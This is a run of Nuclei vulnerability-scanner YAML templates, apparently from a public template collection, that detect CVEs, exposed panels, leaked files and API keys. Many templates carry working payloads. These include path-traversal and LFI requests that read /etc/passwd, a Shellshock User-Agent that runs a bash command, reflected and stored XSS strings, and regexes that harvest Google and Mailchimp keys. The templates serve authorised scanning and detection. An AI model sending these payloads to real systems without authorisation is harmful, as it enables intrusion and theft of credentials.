-------------------------------------------------------------------------------- 1 | id: oracle-ebs-bispgrapgh-file-read 2 | info: 3 | name: Oracle EBS Bispgraph File Access 4 | author: "Alfie Njeru (@emenalf) - https://the-infosec.com" 5 | severity: Critical 6 | requests: 7 | - method: GET 8 | path: 9 | - "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/" 10 | 11 | matchers: 12 | - type: regex 13 | regex: 14 | - "root:[x*]:0:0:" 15 | part: body -------------------------------------------------------------------------------- /vulnerabilities/rce-shellshock-user-agent.yaml: -------------------------------------------------------------------------------- 1 | id: rce-user-agent-shell-shock 2 | 3 | info: 4 | name: Remote Code Execution Via (User-Agent) 5 | author: 0xelkomy 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | headers: 11 | User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" 12 | path: 13 | - "{{BaseURL}}/cgi-bin/status" 14 
| matchers: 15 | - type: regex 16 | regex: 17 | - "root:[x*]:0:0" 18 | part: body 19 | -------------------------------------------------------------------------------- /dns/dead-host-with-cname.yaml: -------------------------------------------------------------------------------- 1 | id: dead-host-with-cname 2 | 3 | info: 4 | name: dead-host-with-cname 5 | author: pdnuclei - projectdiscovery.io 6 | severity: info 7 | 8 | dns: 9 | - name: "{{FQDN}}" 10 | type: A 11 | class: inet 12 | recursion: true 13 | retries: 5 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "NXDOMAIN" 19 | 20 | - type: word 21 | words: 22 | - "IN\tCNAME" 23 | -------------------------------------------------------------------------------- /files/web-config.yaml: -------------------------------------------------------------------------------- 1 | id: web-config 2 | info: 3 | name: Web Config file 4 | author: Yash Anand @yashanand155 5 | severity: info 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - '{{BaseURL}}/web.config' 11 | 12 | matchers-condition: and 13 | matchers: 14 | - type: word 15 | words: 16 | - 17 | - 18 | condition: and 19 | 20 | - type: status 21 | status: 22 | - 200 -------------------------------------------------------------------------------- /security-misconfiguration/jira-unauthenticated-projects.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-projects 2 | 3 | info: 4 | name: Jira Unauthenticated Projects 5 | author: TechbrunchFR 6 | severity: Info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/rest/api/2/project?maxResults=100" 12 | matchers: 13 | - type: word 14 | words: 15 | - 'projects' 16 | - 'startAt' 17 | - 'maxResults' 18 | condition: and 19 | -------------------------------------------------------------------------------- /security-misconfiguration/rack-mini-profiler.yaml: 
-------------------------------------------------------------------------------- 1 | id: rack-mini-profiler 2 | 3 | info: 4 | name: rack-mini-profiler environment information disclosure 5 | author: vzamanillo 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/?pp=env" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - "Rack Environment" 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /cves/CVE-2018-7490.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-7490 2 | 3 | info: 4 | name: uWSGI PHP Plugin Directory Traversal 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: regex 18 | regex: 19 | - "root:[x*]:0:0:" 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2019-12314.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-12314 2 | 3 | info: 4 | name: Deltek Maconomy 2.2.5 LFI 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: regex 18 | regex: 19 | - "root:[x*]:0:0:" 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2020-2096.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-2096 2 | 3 | info: 4 | name: Jenkins Gitlab Hook XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - 
"{{BaseURL}}/gitlab/build_now%3Csvg/onload=alert(1337)%3E" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - "" 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2020-5284.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-5284 2 | 3 | info: 4 | name: Next.js .next/ limited path traversal 5 | author: Harsh & Rahul 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/_next/static/../server/pages-manifest.json" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: regex 16 | regex: 17 | - '\{"/_app":".*?_app\.js"' 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /files/public-tomcat-instance.yaml: -------------------------------------------------------------------------------- 1 | id: public-tomcat-instance 2 | 3 | info: 4 | name: tomcat manager disclosure 5 | author: Ahmed Sherif 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/manager/html' 12 | - '{{BaseURL}}:8080/manager/html' 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - Apache Tomcat 18 | - type: status 19 | status: 20 | - 401 21 | -------------------------------------------------------------------------------- /security-misconfiguration/front-page-misconfig.yaml: -------------------------------------------------------------------------------- 1 | id: front-page-misconfig 2 | 3 | info: 4 | name: FrontPage configuration information disclosure 5 | author: JTeles 6 | severity: info 7 | # Reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/_vti_inf.html" 13 | matchers: 14 | - type: size 15 | size: 16 | 
- 247 17 | -------------------------------------------------------------------------------- /vulnerabilities/wordpress-wordfence-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-wordfence-xss 2 | 3 | info: 4 | name: WordPress Wordfence 7.4.6 Cross Site Scripting 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E" 12 | matchers: 13 | - type: word 14 | words: 15 | - "" 16 | part: body 17 | -------------------------------------------------------------------------------- /files/apc-info.yaml: -------------------------------------------------------------------------------- 1 | id: apcu-service 2 | 3 | info: 4 | name: APCu service information leakage 5 | author: koti2 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/apc/apc.php" 12 | - "{{BaseURL}}/apc.php" 13 | matchers: 14 | - type: word 15 | words: 16 | - "APCu Version Information" 17 | - "General Cache Information" 18 | - "Detailed Memory Usage and Fragmentation" 19 | condition: or 20 | -------------------------------------------------------------------------------- /technologies/jaspersoft-detect.yaml: -------------------------------------------------------------------------------- 1 | id: Jaspersoft-detect 2 | 3 | info: 4 | name: Jaspersoft detected 5 | author: koti2 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/jasperserver/login.html?error=1" 12 | matchers: 13 | - type: word 14 | words: 15 | - "TIBCO Jaspersoft: Login" 16 | - "Could not login to JasperReports Server" 17 | - "About TIBCO JasperReports Server" 18 | condition: or 19 | -------------------------------------------------------------------------------- /panels/weave-scope-dashboard-detect.yaml: -------------------------------------------------------------------------------- 
1 | id: weave-scope-dashboard-detect 2 | 3 | info: 4 | name: Weave Scope Dashboard 5 | author: e_schultze_ 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "Weave Scope" 17 | - "__WEAVEWORKS_CSRF_TOKEN" 18 | - "__CSRF_TOKEN_PLACEHOLDER__" 19 | condition: and 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2018-18069.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-18069 2 | 3 | info: 4 | name: Wordpress unauthenticated stored xss 5 | author: nadino 6 | severity: medium 7 | 8 | requests: 9 | - method: POST 10 | path: 11 | - "{{BaseURL}}/wp-admin/admin.php" 12 | body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\">" 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2019-8982.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-8982 2 | info: 3 | name: Wavemaker Studio 6.6 LFI/SSRF 4 | author: madrobot 5 | severity: high 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd" 11 | matchers-condition: and 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: regex 17 | regex: 18 | - "root:[x*]:0:0:" 19 | part: body 20 | -------------------------------------------------------------------------------- /panels/atlassian-crowd-panel.yaml: -------------------------------------------------------------------------------- 1 | id: atlassian-crowd-panel 2 | info: 3 | name: Atlassian Crowd panel detect 4 | author: organiccrap 5 | severity: low 6 | requests: 7 | - method: GET 8 | path: 9 | - '{{BaseURL}}/crowd/console/login.action' 10 | headers: 11 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 
12 | matchers: 13 | - type: word 14 | words: 15 | - Atlassian Crowd - Login 16 | part: body 17 | -------------------------------------------------------------------------------- /cves/CVE-2018-2791.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-2791 2 | 3 | info: 4 | name: Oracle WebCenter Sites XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/servlet/Satellite?c=Noticia&cid={ID}&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=eee%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C" 12 | matchers: 13 | - type: word 14 | words: 15 | - "" 16 | part: body 17 | -------------------------------------------------------------------------------- /vulnerabilities/moodle-filter-jmol-xss.yaml: -------------------------------------------------------------------------------- 1 | id: moodle-filter-jmol-xss 2 | 3 | info: 4 | name: Moodle filter_jmol XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/filter/jmol/iframe.php?_USE=%22};alert(1337);//" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - '\"};alert(1337);//' 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2019-3799.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-3799 2 | info: 3 | name: Spring-Cloud-Config-Server Directory Traversal 4 | author: madrobot 5 | severity: high 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd" 11 | matchers-condition: and 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: regex 17 | regex: 18 | - 'root:[x*]:0:0:' 19 | part: body 20 | 
-------------------------------------------------------------------------------- /files/docker-registry.yaml: -------------------------------------------------------------------------------- 1 | id: docker-registry 2 | 3 | info: 4 | name: Docker Registry Listing 5 | author: puzzlepeaches 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/v2/_catalog" 12 | redirects: true 13 | max-redirects: 1 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - '"repositories":' 19 | - type: word 20 | words: 21 | - "application/json" 22 | part: header 23 | -------------------------------------------------------------------------------- /vulnerabilities/discourse-xss.yaml: -------------------------------------------------------------------------------- 1 | id: Discourse XSS 2 | 3 | info: 4 | name: Discourse CMS XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\">' 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - "" 20 | part: body 21 | -------------------------------------------------------------------------------- /dns/cname-service-detector.yaml: -------------------------------------------------------------------------------- 1 | id: cname-service-detector 2 | 3 | info: 4 | name: 3rd party service checker 5 | author: bauthard 6 | severity: info 7 | 8 | dns: 9 | - name: "{{FQDN}}" 10 | type: CNAME 11 | class: inet 12 | recursion: true 13 | retries: 5 14 | matchers-condition: or 15 | matchers: 16 | - type: word 17 | name: zendesk 18 | words: 19 | - "zendesk.com" 20 | - type: word 21 | name: github 22 | words: 23 | - "github.io" 24 | -------------------------------------------------------------------------------- /cves/CVE-2019-19908.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-19908 
2 | 3 | info: 4 | name: phpMyChat-Plus XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - "" 20 | part: body 21 | -------------------------------------------------------------------------------- /panels/citrix-adc-gateway-detect.yaml: -------------------------------------------------------------------------------- 1 | id: citrix-adc-gateway-panel 2 | info: 3 | name: Citrix ADC Gateway detect 4 | author: organiccrap 5 | severity: low 6 | requests: 7 | - method: GET 8 | path: 9 | - '{{BaseURL}}/logon/LogonPoint/index.html' 10 | - '{{BaseURL}}/logon/LogonPoint/custom.html' 11 | headers: 12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 13 | matchers: 14 | - type: word 15 | words: 16 | - _ctxstxt_CitrixCopyright 17 | -------------------------------------------------------------------------------- /panels/pulse-secure-panel.yaml: -------------------------------------------------------------------------------- 1 | id: pulse-secure-panel 2 | 3 | info: 4 | name: Pulse Secure VPN Panel 5 | author: bsysop 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi" 12 | matchers-condition: or 13 | matchers: 14 | - type: word 15 | words: 16 | - "/dana-na/auth/welcome.cgi" 17 | part: header 18 | 19 | - type: word 20 | words: 21 | - "/dana-na/css/ds.css" 22 | part: body 23 | -------------------------------------------------------------------------------- /tokens/google-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: google-api-key 2 | 3 | info: 4 | name: Google API Key 5 | author: Swissky 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 
| path: 11 | - "{{BaseURL}}" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "AIza[0-9A-Za-z\\-_]{35}" 19 | 20 | extractors: 21 | - type: regex 22 | part: body 23 | regex: 24 | - "AIza[0-9A-Za-z\\-_]{35}" 25 | -------------------------------------------------------------------------------- /vulnerabilities/eclipse-xss.yaml: -------------------------------------------------------------------------------- 1 | id: Eclipse XSS 2 | 3 | info: 4 | name: Eclipse Reflected XSS vulnerability 5 | author: pikpikcu 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/help/index.jsp?view=" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - "" 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2019-8903.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-8903 2 | 3 | info: 4 | name: Totaljs - Unauthenticated Directory Traversal 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - "apache2.conf" 20 | part: body 21 | -------------------------------------------------------------------------------- /technologies/couchdb-detect.yaml: -------------------------------------------------------------------------------- 1 | id: couchdb-detect 2 | info: 3 | name: couchdb detection 4 | author: organiccrap 5 | severity: low 6 | # commonly runs on port 5984/http 7 | requests: 8 | - method: GET 9 | path: 10 | - '{{BaseURL}}/_all_dbs' 11 | headers: 12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 13 | matchers: 14 
| - type: word 15 | words: 16 | - CouchDB/ 17 | - Erlang OTP/ 18 | part: header 19 | condition: and 20 | -------------------------------------------------------------------------------- /technologies/sap-netweaver-as-java-detect.yaml: -------------------------------------------------------------------------------- 1 | id: sap-netweaver-as-java-detect 2 | 3 | info: 4 | name: SAP NetWeaver AS JAVA (LM Configuration Wizard) Detection 5 | author: dwisiswant0 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/CTCWebService/CTCWebServiceBean?wsdl" 12 | matchers-condition: and 13 | matchers: 14 | - type: word 15 | words: 16 | - "urn:CTCWebServiceSi" 17 | part: body 18 | - type: status 19 | status: 20 | - 200 -------------------------------------------------------------------------------- /cves/CVE-2018-11759.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-11759 2 | 3 | info: 4 | name: Apache Tomcat JK Status Manager Access 5 | author: Harsh Bothra 6 | severity: medium 7 | 8 | # Source:- https://github.com/immunIT/CVE-2018-11759 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/jkstatus' 14 | - '{{BaseURL}}/jkstatus;' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | words: 23 | - "JK Status Manager" 24 | -------------------------------------------------------------------------------- /cves/CVE-2018-5230.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-5230 2 | 3 | info: 4 | name: Atlassian Confluence Status-List XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - 
"SRC=\"javascript:alert(1337)\">" 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2019-17382.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-17382 2 | 3 | info: 4 | name: Zabbix Authentication Bypass 5 | author: Harsh Bothra 6 | severity: Critical 7 | # source:- https://nvd.nist.gov/vuln/detail/CVE-2019-17382 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: word 20 | words: 21 | - "Dashboard" 22 | -------------------------------------------------------------------------------- /vulnerabilities/moodle-filter-jmol-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: moodle-filter-jmol-lfi 2 | 3 | info: 4 | name: Moodle filter_jmol LFI 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: regex 18 | regex: 19 | - "root:[x*]:0:0:" 20 | part: body 21 | -------------------------------------------------------------------------------- /vulnerabilities/nginx-module-vts-xss.yaml: -------------------------------------------------------------------------------- 1 | id: nginx-module-vts-xss 2 | 3 | info: 4 | name: Nginx virtual host traffic status module XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: status 16 | status: 17 | - 200 18 | - type: word 19 | words: 20 | - "" 21 | part: body 22 | 
-------------------------------------------------------------------------------- /vulnerabilities/wems-enterprise-xss.yaml: -------------------------------------------------------------------------------- 1 | id: WEMS XSS 2 | 3 | info: 4 | name: WEMS Enterprise Manager XSS 5 | author: pikpikcu 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/guest/users/forgotten?email=">' 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - '">' 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2020-3187.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-3187 2 | 3 | # Reference: https://twitter.com/aboul3la/status/1286809567989575685 4 | 5 | info: 6 | name: CVE-2020-3187 7 | author: KareemSe1im 8 | severity: High 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/+CSCOE+/session_password.html" 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - webvpn 19 | - Webvpn 20 | part: header 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /cves/CVE-2020-3452.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-3452 2 | 3 | # Source: https://twitter.com/aboul3la/status/1286012324722155525 4 | 5 | info: 6 | name: CVE-2020-3452 7 | author: pdteam 8 | severity: medium 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" 14 | matchers: 15 | - type: word 16 | words: 17 | - "INTERNAL_PASSWORD_ENABLED" 18 | - "CONF_VIRTUAL_KEYBOARD" 19 | condition: and 20 | -------------------------------------------------------------------------------- /cves/CVE-2020-8115.yaml: 
-------------------------------------------------------------------------------- 1 | id: CVE-2020-8115 2 | 3 | info: 4 | name: Revive Adserver XSS 5 | author: madrobot & dwisiswant0 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\"" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: regex 18 | part: body 19 | regex: 20 | - (?mi)window\.location\.replace\(".*alert\(1337\) -------------------------------------------------------------------------------- /vulnerabilities/x-forwarded-host-injection.yaml: -------------------------------------------------------------------------------- 1 | id: host-header-injection 2 | 3 | info: 4 | name: Host Header Injection (x-forwarded-host) 5 | author: melbadry9 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | # Example of sending some headers to the servers 11 | headers: 12 | # MD5 hash of melbadry9 13 | X-Forwarded-Host: "0021e78f48fe6525798294b7711c6f72.com" 14 | path: 15 | - "{{BaseURL}}/" 16 | matchers: 17 | - type: word 18 | words: 19 | - "0021e78f48fe6525798294b7711c6f72" 20 | -------------------------------------------------------------------------------- /files/elasticsearch.yaml: -------------------------------------------------------------------------------- 1 | id: elasticsearch 2 | 3 | info: 4 | name: ElasticSearch Information Disclosure 5 | author: Shine 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/_cat/indices?v' 12 | - '{{BaseURL}}:9200/_cat/indices?v' 13 | - '{{BaseURL}}/_all/_search' 14 | - '{{BaseURL}}:9200/_all/_search' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - '"took":' 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /cves/CVE-2019-19719.yaml: 
-------------------------------------------------------------------------------- 1 | id: Tableau Server XSS 2 | 3 | info: 4 | name: Tableau Server XSS 5 | author: pikpikcu 6 | severity: medium 7 | # https://nvd.nist.gov/vuln/detail/CVE-2019-19719 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/en/embeddedAuthRedirect.html?auth=javascript:alert(document.cookie)" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - "javascript:alert(document.cookie)" 20 | part: body 21 | -------------------------------------------------------------------------------- /tokens/mailchimp-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: mailchimp-access-key-value 2 | 3 | info: 4 | name: Mailchimp API Value 5 | author: puzzlepeaches 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "[0-9a-f]{32}-us[0-9]{1,2}" 19 | 20 | extractors: 21 | - type: regex 22 | part: body 23 | regex: 24 | - "[0-9a-f]{32}-us[0-9]{1,2}" 25 | -------------------------------------------------------------------------------- /files/jolokia.yaml: -------------------------------------------------------------------------------- 1 | id: jolokia-instance 2 | 3 | info: 4 | name: Jolokia Version Disclosure 5 | author: mavericknerd & dwisiswant0 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/jolokia/version' 12 | - '{{BaseURL}}:8080/jolokia/version' 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - '"timestamp":' 18 | - '"protocol":' 19 | - '"agent":' 20 | condition: and 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /cves/CVE-2019-5418.yaml: 
-------------------------------------------------------------------------------- 1 | id: CVE-2019-5418 2 | 3 | info: 4 | name: File Content Disclosure on Rails 5 | author: omarkurt 6 | severity: medium 7 | # reference: https://github.com/omarkurt/CVE-2019-5418 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | headers: 14 | Accept: ../../../../../../../../etc/passwd{{ 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: regex 21 | regex: 22 | - "root:[x*]:0:0:" 23 | part: body 24 | -------------------------------------------------------------------------------- /cves/CVE-2018-20824.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-20824 2 | 3 | info: 4 | name: Atlassian Jira WallboardServlet XSS 5 | author: madrobot & dwisiswant0 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: regex 18 | regex: 19 | - (?mi)timeout:\salert\(document\.domain\) 20 | part: body 21 | -------------------------------------------------------------------------------- /cves/CVE-2019-14974.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-14974 2 | 3 | info: 4 | name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting 5 | author: madrobot 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - "url = window.location.search.split(\"?desktop_url=\")[1]" 20 | part: body 21 | 
-------------------------------------------------------------------------------- /cves/CVE-2020-5405.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-5405 2 | 3 | info: 4 | name: Spring Cloud Directory Traversal 5 | author: Harsh Bothra 6 | severity: High 7 | 8 | # source:- https://nvd.nist.gov/vuln/detail/CVE-2020-5405 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd' 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: regex 20 | regex: 21 | - "root:[x*]:0:0:" 22 | part: body 23 | -------------------------------------------------------------------------------- /technologies/prometheus-exposed-panel.yaml: -------------------------------------------------------------------------------- 1 | id: prometheus-exposed-panel 2 | info: 3 | name: Prometheus.io exposed panel 4 | author: organiccrap 5 | severity: low 6 | # usually runs on port http/9090 7 | requests: 8 | - method: GET 9 | path: 10 | - '{{BaseURL}}/graph' 11 | - '{{BaseURL}}:9090/graph' 12 | headers: 13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 14 | matchers: 15 | - type: word 16 | words: 17 | - Prometheus Time Series Collection and Processing Server 18 | -------------------------------------------------------------------------------- /cves/CVE-2018-19439.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-19439 2 | 3 | info: 4 | name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console 5 | author: madrobot & dwisiswant0 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow>' " 35 | matchers: 36 | - type: regex 37 | regex: 38 | - "root:[x*]:0:0:" 39 | - "www-data" 40 | - 
